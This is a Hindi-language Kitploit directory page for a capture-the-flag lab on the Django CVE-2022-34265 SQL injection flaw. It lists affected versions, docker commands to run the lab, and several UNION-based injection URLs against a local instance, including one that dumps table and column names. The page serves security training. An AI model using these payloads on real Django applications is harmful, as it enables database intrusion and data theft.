Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CTF_Django_CVE-2022-34265 | Kitploit
उपकरण/GitHubGitHub/lnwza0x0a/ctf_django_cve-2022-34265
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणCTFलर्निंग और शिक्षाडेटाबेस सुरक्षालैब और अभ्यास
GitHublnwza0x0a/ctf_django_cve-2022-34265

CTF_Django_CVE-2022-34265

रिपॉजिटरी देखें
13 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CTF_CVE-2022-34265

विवरण

Django 3.2 के 3.2.14 से पहले और 4.0 के 4.0.6 से पहले के संस्करणों में एक समस्या पाई गई। यदि अविश्वसनीय डेटा को kind/lookup_name मान के रूप में उपयोग किया जाता है, तो Trunc() और Extract() डेटाबेस फ़ंक्शन SQL इंजेक्शन के प्रति संवेदनशील हैं। जो एप्लिकेशन lookup name और kind के चयन को किसी ज्ञात सुरक्षित सूची तक सीमित रखते हैं, वे प्रभावित नहीं होते हैं।

उपयोग कैसे करें

प्रारंभ करें

root@kitploit:~
git clone https://github.com/coco0x0a/CTF_CVE-2022-34265
cd CVE-2022-34265
sudo docker-compose up -d

स्थिति जांचें

root@kitploit:~
sudo docker ps

हटाएं

root@kitploit:~
sudo docker-compose down

प्रभावित संस्करण

  • Django>= 3.2, < 3.2.14

  • Django >= 4.0, < 4.0.6

पैच किए गए संस्करण

  • Django 3.2.14

  • Django 4.0.6

सत्यापन

पर्यावरण

  • Django 4.0.5
  • Python 3.8.13
  • MySQL 5.7

SQL इंजेक्शन

UNION का उपयोग करते हुए

root@kitploit:~
http://127.0.0.1:8000/extract/?lookup_name=year%20FROM%20start_datetime))%20OR%201=1%20UNION%20SELECT%201--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, 2, 3, 4, 5, 6, 7--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT "TEST", now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT CONCAT(table_name, '~', column_name), now(), now(), now(), now(), now(), now() FROM information_schema.columns--

image

संदर्भ

https://github.com/aeyesec/CVE-2022-34265

https://github.com/ZhaoQi99/CVE-2022-34265

https://github.com/suksit/writeups/tree/main/secplayground/half-year-event-2022

टूल डाउनलोड करें